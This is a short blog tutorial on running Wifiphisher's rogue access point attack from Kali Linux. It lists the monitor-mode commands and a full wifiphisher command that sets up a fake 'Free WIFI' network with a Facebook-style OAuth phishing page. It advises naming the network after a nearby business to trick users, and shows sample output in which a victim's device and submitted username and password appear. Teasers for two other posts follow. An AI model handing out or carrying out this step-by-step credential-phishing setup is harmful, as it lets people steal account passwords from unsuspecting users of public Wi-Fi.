Open Source Detective

Wifiphisher Rogue Access Point Attack

Cover Image for Wifiphisher Rogue Access Point Attack
Open Source Detective

Introduction:

Wifiphisher is a powerful command line tool that ethical hackers can use to create rogue wifi networks and capture sensitive data from unsuspecting users. This tool comes with tons of functionality, for this tutorial I'm going to focus on the rogue network attack in which hackers can create fake wifi access points for users in a public place to connect to and share username/passwords.

Prerequisites:

  1. Installation of Kali Linux (I run mine on a Raspberry Pi 4)
  2. Wifi Dongle with Monitor Mode capabilities

Tutorial:

In order to run this attack we will first need to put the attached wifi dongle into monitor mode. To do this first type the following command to list out the attached interfaces:

ifconfig

Typically it will be the one named 'wlan1' as the 'wlan0' is the internal wifi card which isn't capable of monitor mode.

Next run the following commands

ifconfig wlan1 down

iwconfig wlan1 mode monitor

ifconfig wlan1 up

Now that you have a wifi interface with monitor mode enabled you will be able to use that interface with the wifiphisher attack. Run the following command:

wifiphisher -i wlan1 -e "Free WIFI" -p oauth-login

The -i refers to the interface you will use which is the one we set into monitor mode. The -e is used to set the essid of your fake network. In this case we are just going with 'Free WIFI' but depending on the setting you could use the name of the business you are in to trick users into feeling safe. Finally the -p indicates an authentication page template which will pop up on the users screen when they connect to the network. This one we picked will request their facebook username/password to authenticate. Unknowing users will be tricked into handing over their facebook credentials thinking it is being used to authenticate them with the network. It's a simple example, wifiphisher gives users the ability to customize these templates for more sophisticated attacks. The following is what you'll see when a victim connects.First you can see the list of Connected Victims MAC addresses. Then you'll see in the http requests that the user has provided a username and password that can be used to access their account.

Extensions feed: | Wifiphisher 1.4GIT

| ESSID: Free WIFI

| Channel: 6

| AP interface: wlan0

| Options: [Esc] Quit

|_____________________________

Connected Victims:

da:6b:29:73:58:12 10.0.0.53 Unknown iOS/MacOS

HTTP requests:

[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUaCWcynf_cDxXwCLxiixG1c.ttf

[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/d-6IYplOFocCacKzxwXSOKCWcynf_cDxXwCLxiixG1c.ttf

[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/mnpfi9pxYH-Go5UiibESIqCWcynf_cDxXwCLxiixG1c.ttf

[*] POST request from 10.0.0.53 with wfphshr-username=Test@test.com&wfphshr-password=password

[*] GET request from 10.0.0.53 for http://captive.apple.com/hotspot-detect.html

Conclusion:

Wifiphisher is a powerful tool that any ethical hacker should be comfortable dispatching from their tool belt. Read more about it's additional capabilities here.


More Stories

Cover Image for Tutorial: Pentesting Device with Raspberry Pi Zero

Tutorial: Pentesting Device with Raspberry Pi Zero

Lately I’ve been more and more interested in pentesting and cyber security. To continue my deep dive into the topic I’m going to create a pentesting device out of a Raspberry Pi Zero. A few requirements I want to fulfill. First, I’d like to be able to run many of the commands that you can run in Linux. Second, I’d like it to be battery powered and attach my iPhone to it to run commands. Essentially I’d like to be able to carry the device in my pocket and operate it with my iPhone.

Open Source Detective
Cover Image for Local DNS Server with Pi-Hole

Local DNS Server with Pi-Hole

Recently, I’ve been developing some websites to run on my local network and wanted to create my own DNS server. After some research I realized that building my own custom server would be a lot more work than I wanted to undertake. After a little more searching I came across Pi-Hole which offered a much quicker solution.

Open Source Detective